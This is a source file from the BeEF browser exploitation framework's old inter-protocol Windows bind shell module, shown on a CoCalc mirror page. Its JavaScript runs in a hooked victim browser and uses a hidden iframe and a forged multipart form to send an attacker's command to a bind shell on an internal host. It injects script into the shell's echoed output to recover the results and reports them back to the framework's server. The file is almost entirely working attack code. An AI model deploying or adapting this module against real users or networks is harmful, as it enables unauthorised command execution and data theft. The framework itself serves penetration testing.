Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/ipec/inter_protocol_win_bindshell/command.old.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6
// This is the old module which supports bi-directional communications for Firefox before version ~16

7
beef.execute(function() {

8


9
	var target_ip   = "<%= @ip %>";

10
	var target_port = "<%= @port %>";

11
	var cmd         = "<%= @cmd %>";

12
	var timeout     = "<%= @command_timeout %>";

13
	var internal_counter = 0;

14


15
	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";

16


17
	var iframe = document.createElement("iframe");

18
	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");

19
	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");

20
	document.body.appendChild(iframe);

21


22
	function do_submit(ip, port, content) {

23


24
		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";

25
		var parent = window.location.href;

26


27
		myform=document.createElement("form");

28
		myform.setAttribute("name","data");

29
		myform.setAttribute("method","post");

30
		myform.setAttribute("enctype","multipart/form-data");

31
		myform.setAttribute("action",action);

32
		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 

33
	

34
		myExt = document.createElement("INPUT");

35
		myExt.setAttribute("id",<%= @command_id %>);

36
		myExt.setAttribute("name",<%= @command_id %>);

37
		myExt.setAttribute("value",content);

38
		myform.appendChild(myExt);

39
		myExt = document.createElement("INPUT");

40
		myExt.setAttribute("id","endTag");

41
		myExt.setAttribute("name","</div>");

42
		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");

43


44
		myform.appendChild(myExt);

45
		myform.submit();

46
	}

47


48
	function waituntilok() {

49


50
		try {

51
			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {

52
				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;

53
				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));

54
				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));

55
				document.body.removeChild(iframe);

56
				return;

57
			} else throw("command results haven't been returned yet");

58
		} catch (e) {

59
			internal_counter++;

60
			if (internal_counter > timeout) {

61
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');

62
				document.body.removeChild(iframe);

63
				return;

64
			}

65
			setTimeout(function() {waituntilok()},1000);

66
		}

67
	}

68


69
	// validate target host

70
	if (!target_ip) {

71
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');

72
		return;

73
	}

74


75
	// validate target port

76
	if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {

77
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');

78
		return;

79
	}

80


81
	// send commands

82
	do_submit(target_ip, target_port, cmd);

83
	waituntilok();

84


85
});

86


87


88